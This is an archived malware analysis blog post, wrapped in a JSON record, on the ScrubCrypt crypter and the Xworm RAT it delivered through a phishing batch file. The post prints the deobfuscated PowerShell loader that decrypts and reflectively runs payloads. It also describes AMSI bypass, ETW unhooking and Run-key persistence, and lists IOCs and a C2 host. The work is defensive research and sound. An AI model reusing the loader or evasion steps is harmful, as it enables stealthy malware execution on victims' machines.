{
	"id": "ac86d20b-bbe5-40fd-80f7-84cd22062dcb",
	"created_at": "2026-04-06T00:20:03.695365Z",
	"updated_at": "2026-04-10T13:11:41.497736Z",
	"deleted_at": null,
	"sha1_hash": "5978ed4c47afa5909567552d6069b34f0e8679dd",
	"title": "ScrubCrypt - The Rebirth of Jlaive",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 5980812,
	"plain_text": "ScrubCrypt - The Rebirth of Jlaive\r\nBy 0xToxin\r\nPublished: 2023-03-19 · Archived: 2026-04-05 14:24:29 UTC\r\nIntroPermalink\r\nIn this blog we are going through a recent phishing campaign that leverages a new crypter sold in underground\r\nforums.\r\nOverviewPermalink\r\nIn the past weeks a new thread was posted in the “Cryptography and Encryption Market” section in\r\nhackforums.net promoting a new crypter called “ScrubCrypt”\r\nThis crypter was found used in a recent phishing campaign which eventually delivered Xworm RAT.\r\nWe will be going through all the analysis steps from the phishing mail the victim receives to analyzing and\r\ndeobfuscating the crypter(and its origin) and identifying the final Xworm binary.\r\nThe PhishPermalink\r\nThe user received a mail with the subject: “LEP/RFQ/AV/04/2022/6030”, the mail itself contains a generic body\r\ncontent, letting the user know that he has an attachment that needs to be open.\r\nhttps://0xtoxin.github.io/threat%20breakdown/ScrubCrypt-Rebirth-Of-Jlaive/\r\nPage 1 of 19\n\nThe mail has attached archive file (LEPRFQAV04,pdf.001), inside of it we can find a .bat file (batch script) that\r\nsupposed to be executed by the user and lead to a multistage execution chain.\r\nhttps://0xtoxin.github.io/threat%20breakdown/ScrubCrypt-Rebirth-Of-Jlaive/\r\nPage 2 of 19\n\nLEPRFQAV04,pdf.batPermalink\r\nStatic InformationPermalink\r\nSha256: 04ce543c01a4bace549f6be2d77eb62567c7b65edbbaebc0d00d760425dcd578\r\nVT Detection: 24/61 (Link)\r\nThe script is completely obfuscated:\r\nBy first glance we can notice 2 main things:\r\n1. The script has junk code which utilize the % symbol in batch scripting.\r\n2. The end of the script contains a huge encrypted blob of data as a comment (::)\r\nBatch DeobfuscationPermalink\r\nI start off with removing all the junk code the script contains by using the next script:\r\nimport re\r\nNON_WORD_PATTERN = '%\\W%'\r\nhttps://0xtoxin.github.io/threat%20breakdown/ScrubCrypt-Rebirth-Of-Jlaive/\r\nPage 3 of 19\n\nfile_path = '/Users/igal/malwares/Scrub Crypt/3 - LEPRFQAV04,pdf.bat'\r\nfo = open(file_path,'r').read()\r\nclean_script = re.sub(NON_WORD_PATTERN,'',fo)\r\nprint(clean_script)\r\n```batch\r\n @echo off\r\n powershell -w hidden -c #\r\n set CUnTR=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\n copy %CUnTR% \"%~0.exe\" /y \u0026\u0026 cls\r\n \"%~0.exe\" function yA($t){$t.Replace('@', '')}$iwqO=yA 'Get@C@urr@ent@P@roce@ss@';$knsa=yA 'Rea@dAl@lT@e@xt@\r\n ::K8fQqk7xvojjb2P9cYvAvVZq2lXoHsKBw6gFb0XhzLyV5n92FTvZL6MK9KFRY8weBiypW/knQPmWgUurEdWUIrgCmzr2gamQnLsxndquXE\r\nGreat, now the script is less obfuscated and we can see that there is a powershell script embedded.\r\nI’ve cleaned the script and changed some of the variable names:\r\npowershell -w hidden -c #\r\nset Copy_Ps1_binary=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\ncopy %Copy_Ps1_binary% \"%~0.exe\" /y \u0026\u0026 cls\r\n\"%~0.exe\" function f_remove_@($t){\r\n$t.Replace('@', '')\r\n}\r\n$v_GetCurrentProcess=f_remove_@ 'Get@C@urr@ent@P@roce@ss@';\r\n$v_ReadAllText=f_remove_@ 'Rea@dAl@lT@e@xt@';\r\n$v_EntryPoint=f_remove_@ 'En@t@ry@Poin@t@';\r\n$v_ChangeExtension=f_remove_@ 'Ch@ange@E@xte@nsi@on@';\r\n$v_FromBase64String=f_remove_@ 'From@Bas@e64S@tri@ng@';\r\n$v_Load=f_remove_@ 'Lo@ad@';\r\n$v_TransformFinalBlock=f_remove_@ 'Tr@a@n@sfor@m@F@in@al@B@lo@ck@';\r\n$v_Split=f_remove_@ 'Sp@l@it@';\r\n$v_Invoke=f_remove_@ 'In@vo@ke@';\r\n$v_CreateDecryptor=f_remove_@ 'Cre@at@eD@ec@ry@pto@r@';\r\nfunction f_aes_decrypt($enc_data,$b64_enc_key,$b64_enc_iv){\r\n$v_aescryptor=[System.Security.Cryptography.Aes]::Create();\r\n$v_aescryptor.Mode=[System.Security.Cryptography.CipherMode]::CBC;\r\n$v_aescryptor.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;\r\n$v_aescryptor.Key=[System.Convert]::$v_FromBase64String($b64_enc_key);\r\n$v_aescryptor.IV=[System.Convert]::$v_FromBase64String($b64_enc_iv);\r\n$v_aes_decryptor=$v_aescryptor.$v_CreateDecryptor();\r\n$v_decrypted_data=$v_aes_decryptor.$v_TransformFinalBlock($enc_data,0,$enc_data.Length);\r\n$v_aes_decryptor.Dispose();\r\n$v_aescryptor.Dispose();\r\n$v_decrypted_data; # return compressed data\r\n}\r\nhttps://0xtoxin.github.io/threat%20breakdown/ScrubCrypt-Rebirth-Of-Jlaive/\r\nPage 4 of 19\n\nfunction f_decompress_data($compressed_data){\r\n$v_data_memstream=New-Object System.IO.MemoryStream(,$compressed_data);\r\n$v_decompressed_data=New-Object System.IO.MemoryStream;\r\n$v_gzip_stream=New-Object System.IO.Compression.GZipStream($v_data_memstream,[IO.Compression.Compressio\r\n$v_gzip_stream.CopyTo($v_decompressed_data);\r\n$v_gzip_stream.Dispose();\r\n$v_data_memstream.Dispose();\r\n$v_decompressed_data.Dispose();\r\n$v_decompressed_data.ToArray(); # returns byte array of the payload\r\n}\r\nfunction f_invoke_payload($payload,$b64_enc_key){\r\n[System.Reflection.Assembly]::$v_Load([byte[]]$payload).$v_EntryPoint.$v_Invoke($null,$b64_enc_key);\r\n}\r\n$batfile_data=[System.IO.File]::$v_ReadAllText([System.IO.Path]::$v_ChangeExtension([System.Diagnostics.Process]\r\n$blob_data_chunk=$batfile_data[$batfile_data.Length-1].Substring(2); #takes the last splitted data from the '2'\r\n$blob_data=[string[]]$blob_data_chunk.$v_Split('\\'); #the blob data splitted by '\\'\r\n$payload2=f_decompress_data (f_aes_decrypt ([Convert]::$v_FromBase64String($blob_data[0])) $blob_data[2] $blob_d\r\n$payload1=f_decompress_data (f_aes_decrypt ([Convert]::$v_FromBase64String($blob_data[1])) $blob_data[2] $blob_d\r\nf_invoke_payload $payload1 $null;\r\nf_invoke_payload $payload2 $null;\r\nWhat the script does?Permalink\r\nThe script takes the blob data I’ve mentioned that comes right after the :: comment in the batch script.\r\nIt will split it by backslash and save the splitted data in a variable ($blob_data_chunk)\r\nThe variable will be now an array with 4 elements:\r\nEncrypted data 1\r\nEncrypted data 2\r\nBase64 encoded AES256 encryption key\r\nBase64 encoded AES256 encryption IV\r\nThe script will pass each encrypted data with the encoded key and IV to decryption function (f_aes_decrypt), the\r\nreturn value from the function will be gz archive which will then be passed to a decompress function\r\n(f_decompress_data) which will return binary in a form of byte array.\r\nhttps://0xtoxin.github.io/threat%20breakdown/ScrubCrypt-Rebirth-Of-Jlaive/\r\nPage 5 of 19\n\nAnd the last thing the script will do is to invoke and execute these binaries.\r\nThe next script can be used to retrieve the archives:\r\nfrom Crypto.Cipher import AES\r\nfrom base64 import b64decode\r\ndef aes_decrypt(data, key, iv):\r\n decrypt_cipher = AES.new(key, AES.MODE_CBC, iv)\r\n return decrypt_cipher.decrypt(data)\r\ndata_blob = clean_script.split('::')[-1].split('\\\\')\r\nenc_blob_1 = b64decode(data_blob[0])\r\nenc_blob_2 = b64decode(data_blob[1])\r\nkey = b64decode(data_blob[2])\r\niv = b64decode(data_blob[3])\r\narchive_1 = aes_decrypt(enc_blob_1, key, iv)\r\narchive_2 = aes_decrypt(enc_blob_2, key, iv)\r\nfile_path = '/Users/igal/malwares/Scrub Crypt/archive'\r\nfo = open('{0}{1}.gz'.format(file_path,1),'wb').write(archive_1)\r\nfo = open('{0}{1}.gz'.format(file_path,2),'wb').write(archive_2)\r\nNow we can go through the binaries and analyze each one of them; based on the script execution flow, the first\r\nbinary that will be executed is the one stored in archive2.\r\nXsXllt.tmpPermalink\r\nStatic InformationPermalink\r\nhttps://0xtoxin.github.io/threat%20breakdown/ScrubCrypt-Rebirth-Of-Jlaive/\r\nPage 6 of 19\n\nSha256: 05eac401aa9355f131d0d116c285d984be5812d83df3a297296d289ce523a2b1\r\nVT Detection: 18/71 (Link)\r\nThe binary is .NET based as we can inspect using DiE\r\nI’ve opened the binary in DnSpy and found out it’s obfuscated:\r\nBreaking the deobfuscationPermalink\r\nI will be going through now a way I’ve managed to deobfuscate the code and make it text clear. First of all, we\r\nopen up SAE(SimpleAssemblyExplorer) and navigate to the location where the binary is located, right click on\r\nthe binary and select “Deobfuscator”:\r\nhttps://0xtoxin.github.io/threat%20breakdown/ScrubCrypt-Rebirth-Of-Jlaive/\r\nPage 7 of 19\n\nThen we simply click OK and waiting for SAE to deobfuscate for us the code:\r\nNow we can open up the binary and find out that it’s a bit more clearer then previously:\r\nBut this is not enough, we can see that there is a repetitive method being used by the program c000001.m000001 ,\r\nwe can use De4Dot and deobfuscate the code even more, one thing that we need for it is the method token (which\r\ncan be retrieved by clicking the method and looking on the comment above it):\r\nhttps://0xtoxin.github.io/threat%20breakdown/ScrubCrypt-Rebirth-Of-Jlaive/\r\nPage 8 of 19\n\nNow that we have the token we can use the next command to deobfuscate the code: de4dot.exe\r\n\u003cSAE_deobfuscated_binary\u003e --strtyp delegate --strtok 06000001\r\nAfter the deobfuscation process was successed, a “clean” binary will be created in the binary folder, we can open\r\nit in DnSpy and see how the magic happend and work with a clear text binary:\r\nEvasion TechniquesPermalink\r\nThis binary does 2 main operations:\r\nAMSI bypass - The dev isn’t trying to be too much creative and copycats rasta-mouse AmsiBypass C#\r\ncode which can be found on his github repo\r\nhttps://0xtoxin.github.io/threat%20breakdown/ScrubCrypt-Rebirth-Of-Jlaive/\r\nPage 9 of 19\n\nETW unhooking - The dev adding a layer of protection by unhooking EtwEventWrite (Event Tracing for\r\nWindows) which will disable the logging for Assembly.Load calls, this topic is explained in depth by\r\nhttps://0xtoxin.github.io/threat%20breakdown/ScrubCrypt-Rebirth-Of-Jlaive/\r\nPage 10 of 19\n\nXPN.\r\nXPN shares a POC code for the unhooking on his github repo\r\nAfter the execution of this binary, the second binary will be executed which is stored in Archive1 (the execution\r\nof this binary won’t be logged in the event tracer as the unhook in the previous binary occured).\r\nJuCdip.tmpPermalink\r\nStatic InformationPermalink\r\nSha256: ad13c0c0dfa76575218c52bd2a378ed363a0f0d5ce5b14626ee496ce52248e7a\r\nVT Detection: 23/70 (Link)\r\nThe binary is .NET based as we can inspect using DiE\r\nhttps://0xtoxin.github.io/threat%20breakdown/ScrubCrypt-Rebirth-Of-Jlaive/\r\nPage 11 of 19\n\nI’ve opened up the binary in DnSpy and found out it’s obfuscated (for the sake of not making this blog too\r\nmuch long, i will skip the deobfuscation process of this binary as it’s the same we did with the previous one)\r\nThe clear code:\r\nPersistence \u0026 ExecutionPermalink\r\nNow that we have the clean code, we can go thorugh what the binary actually does, firstly thing that I’ve noticed\r\n(that eventually led me to finding the ScrubCrypt origin) is the name of the binary SCRUBCRYPT\r\nhttps://0xtoxin.github.io/threat%20breakdown/ScrubCrypt-Rebirth-Of-Jlaive/\r\nPage 12 of 19\n\nAfter that I’ve started to searching for it’s origin but this will be explained later.\r\nThe binary does two main things:\r\nPersistence: Once the program executed it will create a powershell task to delete the binary file from the\r\nvictim’s computer once the execution of the program is done.\r\nThen the program creates a Mutex ( iJOMzLdJpA , if the mutex already taken it will terminate itself)\r\nThe program will then lookup in the registry and in the startup folder whether or not a persistence for the binary\r\nwas laready made.\r\nhttps://0xtoxin.github.io/threat%20breakdown/ScrubCrypt-Rebirth-Of-Jlaive/\r\nPage 13 of 19\n\nIf the program couldn’t find any persistence related to the binary it will create its own persistence by creating two\r\nfiles in the appdata folder one file is a .bat file with the content of the initial batch file and second file which is a\r\n.vbs file that will execute the .bat file; a registry key will be created under\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run which will execute the .vbs file once the system is\r\nrebooted, the mutex then will be released and the program will execute itself again.\r\nExecution: After the program was restarted and confirmed its own persistence it will execute the final\r\npayload which is stored encrypted in the binary resources:\r\nThe encrypted data is simply Xor’ed with a 32 byte long key (in this case:\r\naZAZGrVOlgDxdyHvNzxAcXRlcnuJCRId ); After the xor operation the program will decompress the payload out of\r\nthe xor’ed archive.\r\nhttps://0xtoxin.github.io/threat%20breakdown/ScrubCrypt-Rebirth-Of-Jlaive/\r\nPage 14 of 19\n\nThen\r\nthe program will load the final payload and invoke its EntryPoint :\r\nI’ve created a small script that will extract the resource from the binary, xor it and will save the final payload\r\narchive:\r\nimport dnfile\r\nfrom binascii import hexlify\r\nFILEPATH = '/Users/igal/malwares/Scrub Crypt/4 - scrubcrypt binary.bin'\r\nXOR_KEY = 'aZAZGrVOlgDxdyHvNzxAcXRlcnuJCRId'\r\ndef xor_helper(to_xor, key):\r\n key_len = len(key)\r\n decoded = []\r\n for i in range(0,len(to_xor)):\r\n decoded.append(to_xor[i] ^ key[i % key_len])\r\n return bytes(decoded)\r\npe = dnfile.dnPE(FILEPATH)\r\nfor rsrc in pe.net.resources:\r\n rsrc_data = xor_helper(rsrc.data, XOR_KEY.encode())\r\nhttps://0xtoxin.github.io/threat%20breakdown/ScrubCrypt-Rebirth-Of-Jlaive/\r\nPage 15 of 19\n\nfile_path = '/Users/igal/malwares/Scrub Crypt/final_payload'\r\n fo = open('{0}.gz'.format(file_path),'wb').write(rsrc_data)\r\nThe Final PayloadPermalink\r\nThe purpose of the blog is mainly to cover the crypter but because the final payload being delivered by the crypter\r\nis pretty unknown we will cover it in few sentences.\r\nStatic InformationPermalink\r\nSha256: 814187405811f7d0e9593ae1ddf0a43ccbd9e8a37bee7688178487eeef3860c6\r\nVT Detection: 41/71 (Link)\r\nOpening the binary in DnSpy we can see that the binary name is XWormClient\r\nBy quick analyzing it, the malware is Xworm RAT which is selled on underground forums for a price tag of 100$\r\nhttps://0xtoxin.github.io/threat%20breakdown/ScrubCrypt-Rebirth-Of-Jlaive/\r\nPage 16 of 19\n\nThe malware is created by the EvilCoder Project and their post thread can be found in Cracked.io forum:\r\nScrubCrypt OriginPermalink\r\nhttps://0xtoxin.github.io/threat%20breakdown/ScrubCrypt-Rebirth-Of-Jlaive/\r\nPage 17 of 19\n\nNow that we’ve covered the campaign, we can talk about the origin of the crypter.\r\nThe crypter is being sold on Hackforums (as mentioned on the beginning of the blog) for about 40$ (for 1 month\r\nsub)\r\nWhen I was investigating ScrubCrypt I was suspecting that the crypter is a simple copycat of a well known\r\nBatchfuscator crypter Jlaive (Github).\r\nAfter reading some customers comments on the Hackforums post I’ve stumbled upon this comment:\r\nWhich followed up with answer from Chash (Jlaive crypter developer):\r\nConclusionPermalink\r\nIn this blogpost we went over the execution pattern of the recent rebranded Jlaive crypter, which eventually\r\nexecutes a RAT type malware from the Xworm family.\r\nScrubCrypt was created for marketing reasons and keeping the name of the “Jlaive” crypter alive.\r\nHopefully this blog tought you all of you some new tricks :)\r\nIOC’s:Permalink\r\nSamples:\r\nhttps://0xtoxin.github.io/threat%20breakdown/ScrubCrypt-Rebirth-Of-Jlaive/\r\nPage 18 of 19\n\nLEPRFQAV04,pdf.001 -\r\n28d6b3140a1935cd939e8a07266c43c0482e1fea80c65b7a49cf54356dcb58bc\r\nLEPRFQAV04,pdf.bat -\r\n04ce543c01a4bace549f6be2d77eb62567c7b65edbbaebc0d00d760425dcd578\r\namsi \u0026 etw.bin - 05eac401aa9355f131d0d116c285d984be5812d83df3a297296d289ce523a2b1\r\nscrubcrypt binary.bin - ad13c0c0dfa76575218c52bd2a378ed363a0f0d5ce5b14626ee496ce52248e7a\r\nxworm.bin - 814187405811f7d0e9593ae1ddf0a43ccbd9e8a37bee7688178487eeef3860c6\r\nC2:\r\nhurricane.ydns.eu:2311\r\nReferences:Permalink\r\nScrubCrypt selling thread\r\nScrubCrypt shop\r\nJlaive Crypter Git\r\nXworm selling thread\r\nXworm shop\r\nXworm cracked version\r\nRastaMouse AMSI POC\r\nXPN ETW blog\r\nXPN ETW POC\r\nSimple assembly explorer\r\nDe4Dot\r\nSource: https://0xtoxin.github.io/threat%20breakdown/ScrubCrypt-Rebirth-Of-Jlaive/\r\nhttps://0xtoxin.github.io/threat%20breakdown/ScrubCrypt-Rebirth-Of-Jlaive/\r\nPage 19 of 19",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://0xtoxin.github.io/threat%20breakdown/ScrubCrypt-Rebirth-Of-Jlaive/"
	],
	"report_names": [
		"ScrubCrypt-Rebirth-Of-Jlaive"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434803,
	"ts_updated_at": 1775826701,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5978ed4c47afa5909567552d6069b34f0e8679dd.pdf",
		"text": "https://archive.orkl.eu/5978ed4c47afa5909567552d6069b34f0e8679dd.txt",
		"img": "https://archive.orkl.eu/5978ed4c47afa5909567552d6069b34f0e8679dd.jpg"
	}
}